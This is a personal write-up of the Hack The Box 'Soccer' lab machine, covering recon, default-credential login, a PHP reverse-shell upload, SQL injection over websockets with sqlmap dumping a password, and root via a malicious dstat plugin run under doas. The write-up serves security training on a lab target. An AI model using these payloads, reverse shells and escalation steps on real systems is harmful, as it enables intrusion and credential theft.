HTB Soccer done
Soccer
OS:
Linux
Technology:
Tiny File Manager 2.4.3
IP Address:
10.10.11.194
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
9091/tcp open xmltec-xmlmail?
Users and pass:
Default creds for tiny (https://github.com/prasathmani/tinyfilemanager)
L: admin
P: admin@123
L: user
P: 12345
---
From dump DB MySQL
L: player
P: PlayerOftheMatch2022
---
Nmap
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.194_nmap 10.10.11.194 ; cat 10.10.11.194_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-23 09:56 CEST
Nmap scan report for 10.10.11.194
Host is up (0.054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
| 256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
|_ 256 5797565def793c2fcbdb35fff17c615c (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
9091/tcp open xmltec-xmlmail?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix:
| HTTP/1.1 400 Bad Request
| Connection: close
| GetRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 139
| Date: Tue, 23 Apr 2024 07:57:32 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot GET /</pre>
| </body>
| </html>
| HTTPOptions, RTSPRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Date: Tue, 23 Apr 2024 07:57:32 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot OPTIONS /</pre>
| </body>
|_ </html>
Ffuz - subdomain
Nothing interesing here
___
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ ffuf -u http://10.10.11.194/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.10.11.194_ffuz -of all -e .php,.html,.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.194/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt
:: Output file : 10.10.11.194_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [81876/81876] :: Job [1/1] :: 586 req/sec :: Duration: [0:01:38] :: Errors: 0 ::
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ ffuf -u http://10.10.11.194 -H "Host: FUZZ.soccer.htb" -c -w /usr/share/wordlists/dirb/big.txt -ac -o 10.10.11.194_ffuz -of all
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.194
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Header : Host: FUZZ.soccer.htb
:: Output file : 10.10.11.194_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [20469/20469] :: Job [1/1] :: 952 req/sec :: Duration: [0:00:25] :: Errors: 0 ::
Add IP to /etc/hosts
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿pentest)-[~]
└─# echo "10.10.11.194 soccer.htb" >> /etc/hosts
Feroxbuster - http://soccer.htb
Found interesing links:
/tiny
/tiny/uploads
___
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ feroxbuster -u http://soccer.htb -o soccer.htb_feroxbuster
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.2
───────────────────────────┬──────────────────────
🎯 Target Url │ http://soccer.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.2
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💾 Output File │ soccer.htb_feroxbuster
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 7l 12w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 7l 10w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 494l 1440w 96128c http://soccer.htb/ground3.jpg
200 GET 2232l 4070w 223875c http://soccer.htb/ground4.jpg
200 GET 809l 5093w 490253c http://soccer.htb/ground1.jpg
200 GET 711l 4253w 403502c http://soccer.htb/ground2.jpg
200 GET 147l 526w 6917c http://soccer.htb/
301 GET 7l 12w 178c http://soccer.htb/tiny => http://soccer.htb/tiny/
301 GET 7l 12w 178c http://soccer.htb/tiny/uploads => http://soccer.htb/tiny/uploads/
[####################] - 57s 90021/90021 0s found:7 errors:0
[####################] - 41s 30000/30000 739/s http://soccer.htb/
[####################] - 42s 30000/30000 709/s http://soccer.htb/tiny/
[####################] - 42s 30000/30000 711/s http://soccer.htb/tiny/uploads/
Login to tiny panel administrator
Default creds from github -- https://github.com/prasathmani/tinyfilemanager
L: admin
P: admin@123
L: user
P: 12345
---
Open website and put creds
http://soccer.htb/tiny/tinyfilemanager.php?p=
---
Found version of tiny file manager
Tiny File Manager 2.4.3
PHP revshell
Create a revshell
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ cat revshell.php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.7/80 0>&1'");
?>
Upload revshell
We have to upload revshell to location: /var/www/html/tiny/uploads
http://soccer.htb/tiny/tinyfilemanager.php?p=tiny%2Fuploads&upload
Run revshell
Check revshell was uploads
http://soccer.htb/tiny/tinyfilemanager.php?p=tiny%2Fuploads
---
Start netcat
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ rlwrap -cAr nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.194] 34914
bash: cannot set terminal process group (1050): Inappropriate ioctl for device
bash: no job control in this shell
www-data@soccer:~/html/tiny/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@soccer:~/html/tiny/uploads$
www-data@soccer:~/html/tiny/uploads$ find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/player/user.txt
www-data@soccer:~/html/tiny/uploads$ cat /home/player/user.txt
cat /home/player/user.txt
cat: /home/player/user.txt: Permission denied
www-data@soccer:~/html/tiny/uploads$
---
Run revshell
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ curl http://soccer.htb/tiny/uploads/revshell.php
<html>
<head><title>504 Gateway Time-out</title></head>
<body>
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
Enumeration
Netstat - list services
I see 3 ports: 33060;3306;3000 works on localhost
33060 - DB
3306 - DB
3000 - WWW
---
www-data@soccer:~/html/tiny/uploads$ netstat -tulpn
netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:9091 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1093/nginx: worker
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN 1093/nginx: worker
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
www-data@soccer:~/html/tiny/uploads$
---
www-data@soccer:~/html/tiny/uploads$ curl localhost:3000 | head -n 10
curl localhost:3000 | head -n 10
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="/js/bootstrap.bundle.min.js"></script>
<script src="/js/jquery.min.js"></script>
<title>Soccer</title>
100 6749 100 6749 0 0 1318k 0 --:--:-- --:--:-- --:--:-- 1318k
(23) Failed writing body
www-data@soccer:~/html/tiny/uploads$
---
www-data@soccer:~/html/tiny/uploads$ mysql -p 3306 ; mysql -p 33060
mysql -p 3306 ; mysql -p 33060
Enter password:
ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: NO)
Enter password:
ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: NO)
www-data@soccer:~/html/tiny/uploads$
Read nginx config file: /etc/nginx/sites-available/
We found subdomain: soc-player.soccer.htb add to /etc/hosts
___
Read config file: /etc/nginx/sites-available/default
www-data@soccer:~/html/tiny/uploads$ cat /etc/nginx/sites-available/default
cat /etc/nginx/sites-available/default
server {
listen 80;
listen [::]:80;
server_name 0.0.0.0;
return 301 http://soccer.htb$request_uri;
}
server {
listen 80;
listen [::]:80;
server_name soccer.htb;
root /var/www/html;
index index.html tinyfilemanager.php;
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php7.4-fpm.sock;
}
location ~ /\.ht {
deny all;
}
}
---
Read config file: /etc/nginx/sites-available/soc-player.htb
www-data@soccer:~/html/tiny/uploads$ cat /etc/nginx/sites-available/soc-player.htb
<oads$ cat /etc/nginx/sites-available/soc-player.htb
server {
listen 80;
listen [::]:80;
server_name soc-player.soccer.htb;
root /root/app/views;
location / {
proxy_pass http://localhost:3000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}
Add hostname to /etc/hosts
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ cat /etc/hosts | grep soccer
10.10.11.194 soccer.htb soc-player.soccer.htb
Register an account on the login
e-mail: [email protected]
username: pentester
password: Qwerty123
---
Create user
http://soc-player.soccer.htb/signup
---
Login to PA
http://soc-player.soccer.htb/check
Analyse network connection
It is websocket, I can sent JSON with ID
http://soc-player.soccer.htb/check
SQLi over Websockets
SQLi - basic test
Payload: 0 OR 1=1--
---
{"id":"0 OR 1=1--"}
SQLi - UNION
Payload: 0 UNION select 1,2,3--
---
{"id":"0 UNION select 1,2,3--"}
SQLi - UNION table mysql.user
Payload: 0 UNION select user,2,3 from mysql.user where user like 'r%'--
---
{"id":"0 UNION select user,2,3 from mysql.user where user like 'r%'--"}
sqlmap - basic scan
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1111"}' --dbms mysql --batch --level 5 --risk 3 | tee soc-player.soccer.htb:9091_sqlmap
___
__H__
___ ___[']_____ ___ ___ {1.8.3#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
...
...
...
---
[13:48:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:48:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb'
[*] ending @ 13:48:52 /2024-04-23/
sqlmap - list db
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ sqlmap -u ws://soc-player.soccer.htb:9091 --dbs --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 --threads 10 | tee soc-player.soccer.htb:9091_sqlmap_list_db
___
__H__
___ ___[,]_____ ___ ___ {1.8.3#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
...
...
...
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys
[13:50:56] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb'
[*] ending @ 13:50:56 /2024-04-23/
sqlmap - list tables in soccer_db
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ sqlmap -u ws://soc-player.soccer.htb:9091 -D soccer_db --tables --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 --threads 10 | tee soc-player.soccer.htb:9091_sqlmap_list_tables
___
__H__
___ ___[)]_____ ___ ___ {1.8.3#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
...
...
...
Database: soccer_db
[1 table]
+----------+
| accounts |
+----------+
[13:51:00] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb'
[*] ending @ 13:51:00 /2024-04-23/
!!!!!!!!! sqlmap - dump accounts
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ sqlmap -u ws://soc-player.soccer.htb:9091 -D soccer_db -T accounts --dump --data '{"id": "1111"}' --dbms mysql --batch --level 5 --risk 3 --threads 1 | tee soc-player.soccer.htb:9091_sqlmap_dump_accounts
___
__H__
___ ___[']_____ ___ ___ {1.8.3#stable}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
...
...
...
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id | email | password | username |
+------+-------------------+----------------------+----------+
| 1324 | [email protected] | PlayerOftheMatch2022 | player |
+------+-------------------+----------------------+----------+
[14:35:21] [INFO] table 'soccer_db.accounts' dumped to CSV file '/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb/dump/soccer_db/accounts.csv'
[14:35:21] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb'
[*] ending @ 14:35:21 /2024-04-23/
SSH login as user: player
L: player
P: PlayerOftheMatch2022
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Apr 23 12:44:20 UTC 2024
System load: 0.03
Usage of /: 70.6% of 3.84GB
Memory usage: 22%
Swap usage: 0%
Processes: 229
Users logged in: 0
IPv4 address for eth0: 10.10.11.194
IPv6 address for eth0: dead:beef::250:56ff:feb9:679c
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Apr 23 12:44:06 2024 from 10.10.16.7
player@soccer:~$ id
uid=1001(player) gid=1001(player) groups=1001(player)
Read flag: user.txt
player@soccer:~$ cd ~
player@soccer:~$ ls -a
. .. .bash_history .bash_logout .bashrc .cache .profile .viminfo user.txt
player@soccer:~$ cat user.txt
086c319d6491c435a981fd05f7a618c4
player@soccer:~$
Privilege Escalation
Check /etc/sudoers
player@soccer:~$ sudo -l
[sudo] password for player:
Sorry, user player may not run sudo on localhost.
doas
doas is an alternative to sudo typically found on OpenBSD
---
player@soccer:~$ find / -perm -4000 2>/dev/null | grep -v "core\|lib"
/usr/local/bin/doas
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/at
player@soccer:~$ ls -la /usr/local/bin/doas
-rwsr-xr-x 1 root root 42224 Nov 17 2022 /usr/local/bin/doas
player@soccer:~$
player@soccer:~$ find / -name doas.conf 2>/dev/null
/usr/local/etc/doas.conf
player@soccer:~$
player@soccer:~$ cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat
dstat
dstat is a tool for getting system information.
---
Read man dstat (https://linux.die.net/man/1/dstat)
Paths that may contain external dstat_*.py plugins:
~/.dstat/
(path of binary)/plugins/
/usr/share/dstat/
/usr/local/share/dstat/
---
Create malicious plugin
player@soccer:~$ echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_malicious.py
---
Run dstat
player@soccer:~$ doas /usr/bin/dstat --malicious
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
root@soccer:/home/player# id
uid=0(root) gid=0(root) groups=0(root)
Read flag: root.txt
root@soccer:/home/player# cd /root
root@soccer:~# ls -a
. .bash_history .cache .mysql_history .pm2 .ssh .viminfo root.txt snap
.. .bashrc .local .npm .profile .vim app run.sql
root@soccer:~# cat root.txt
a28d28528cacd2688b106ec9eb9e524b
root@soccer:~#
References
[dstat -man](https://linux.die.net/man/1/dstat)
Lessons Learned